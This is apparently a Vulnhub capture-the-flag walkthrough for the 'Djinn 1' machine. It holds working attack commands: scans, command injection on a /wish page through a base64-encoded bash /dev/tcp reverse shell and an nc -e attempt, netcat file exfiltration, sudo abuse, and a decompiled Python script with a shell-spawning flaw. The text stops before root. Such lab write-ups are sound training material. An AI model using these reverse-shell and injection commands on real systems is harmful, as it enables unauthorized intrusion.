Djinn 1

Djinn 1 vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/djinn 192.168.1.110

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.113
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

nmap -p- -Pn 192.168.1.110

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
1337/tcp open     waste
7331/tcp open     swx
MAC Address: 00:0C:29:3A:97:CE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds

We can see here we have 2 more ports, 1337 and 7331.

FTP

We can see that it has anonymous login. Let's try that

ftp 192.168.1.110

Then, we can list all the directories using ls command

We can see that there are 3 files inside. Let's use get command to get those 3 files

We can see that the content inside these 3 files

More Discovery

We can see that there is port 1337 that we just discovered just now, let's head to the browser

Let's use netcat to get access

Answer 1000 times and I don't think he will give us our gift so let's move on to another port, port 7331.

gobuster

Lets use gobuster to enumerate the URL since we can't find any things interesting inside the site.

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.110:7331/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/22 11:05:12 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2020/05/22 11:06:02 Finished
===============================================================

We can see that there are 2 directory that is /genie and /wish.

Let's navigate to /wish page

Type id then we will get the response from it

Reverse Shell

But when I set up a listener at my kali machine and type

nc -e /bin/bash 192.168.1.113 444

It doesn't work that way, after that we actually need to encode using base64 and use pipe command to decode it and let it execute.

But then no luck too, we need to use bash reverse shell only can work

bash -i >& /dev/tcp/192.168.1.113/4444 0>&1

We then go to this website and encode it with base64

Then, we can go to our /wish and type this

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash

We can first type this to ensure we get a proper shell

python -c 'import pty; pty.spawn("/bin/bash")'

Then we can list out the directory and cat into app.py

Then we cat cat out the credentials.

We can su to the user nitish

Privilege Escalation

We then type sudo -l then we got this

We can use strings command to list out all readable strings from the genie file

We can see there is a -cmd paramter which can be apply.

After playing around we can go to sam user by typing

sudo -u sam genie -cmd new

We then type sudo -l

If we run sudo /root/lago it will show us this

If we enter all the choices we still can't get through the selection.

So, we can navigate to the /home/sam directory to find out more

When we type ls -la then it will show us hidden files

Then we can use netcat to transfer files to our machine

Our machine

nc -nlvp 9000 > abc.pyc

Target machine

nc -nv 192.168.1.113 9000 < .pyc

pyc is actually compiled file of python files. We can use uncompyle6 to decompile to see the source file of it.

uncompyle6 abc.txt

# uncompyle6 version 3.7.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 
# [GCC 9.3.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())
# okay decompiling abc.pyc